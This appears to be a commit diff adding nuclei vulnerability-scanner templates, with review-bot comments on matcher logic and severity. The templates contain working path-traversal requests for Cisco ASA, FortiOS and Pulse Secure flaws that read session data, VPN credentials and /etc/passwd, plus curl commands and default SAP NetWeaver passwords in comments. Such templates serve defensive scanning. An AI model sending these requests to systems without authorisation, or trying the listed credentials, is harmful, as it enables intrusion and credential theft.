pending pull
parent
3bd6b44807
commit
413c126c29
|
@ -0,0 +1,22 @@
|
||||||
|
id: CVE-2018-0296
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco ASA path traversal vulnerability
|
||||||
|
author: organiccrap
|
||||||
|
severity: medium
|
||||||
|
# https://github.com/yassineaboukir/CVE-2018-0296
|
||||||
|
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
||||||
|
# if vuln, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "///sessions"
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
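Review bot: The two matchers here (word `///sessions` on the body, status `200`) have no `matchers-condition`, and nuclei combines matchers with OR by default, so any host that answers 200 on this path is reported as vulnerable. Adding `matchers-condition: and` at the request level makes both indicators required. The same applies to the CVE-2019-11510 template in this commit, where the status matcher alone satisfies the check without the `root:[x*]:0:0:` regex ever being evaluated as a requirement. Separately, `severity: medium` looks low for an unauthenticated session/file listing disclosure and is worth checking against the vendor advisory.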
|
|
@ -0,0 +1,15 @@
|
||||||
|
id: CVE-2018-13379
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
|
||||||
|
author: organiccrap
|
||||||
|
severity: high
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "var fgt_lang ="
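Review bot: The only matcher is the word `var fgt_lang =`, with no `part:` and no status check, unlike the other templates in this commit. That string is presumably the prefix of any `fgt_lang` response, so a device that ignores the traversal and serves a normal language file could still match; this should be confirmed against a patched FortiOS build. Consider adding `part: body`, a `status: 200` matcher and `matchers-condition: and`. A true positive response carries live VPN session data, so scan output from this template should be stored and shared as sensitive material.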
|
|
@ -0,0 +1,20 @@
|
||||||
|
id: CVE-2019-11510
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
|
||||||
|
author: organiccrap
|
||||||
|
severity: high
|
||||||
|
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: firebase-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: firebase detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
# http://ghostlulz.com/google-exposed-firebase-database/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Could not parse auth token"
|
||||||
|
part: body
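Review bot: `severity: low` on this template and on the four panel-detect templates that follow (cisco-asa-panel-detect, grafana-detect, sap-netweaver-portal-detect, supervpn-detect) rates a fingerprint as a finding. A match on `Could not parse auth token` only shows that the host answers like a Firebase database endpoint; it says nothing about whether the rules are open. Suggest `severity: info` for detection-only templates so triage queues are not filled with non-issues, and wording the `name` so it is clear the match is identification only.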
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: cisco-asa-panel-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco ASA VPN panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/+CSCOE+/logon.html"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SSL VPN Service</title>"
|
||||||
|
part: body
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: grafana-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Grafana panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Grafana</title>"
|
||||||
|
part: body
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: sap-netweaver-portal-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SAP NetWeaver Portal detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/irj/portal"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SAP NetWeaver Portal</title>"
|
||||||
|
part: body
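Review bot: The comment in the `info` block lists default credentials, but the request only fetches `/irj/portal` and matches the page title, so a hit says nothing about whether those accounts are enabled. Either drop the comment or replace it with a remediation pointer such as `# on match: verify default SAP accounts are locked or have rotated passwords`, so the template does not read as a default-credential check.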
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: supervpn-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SuperVPN panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/admin/login.html"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Sign In-SuperVPN</title>"
|
||||||
|
part: body
|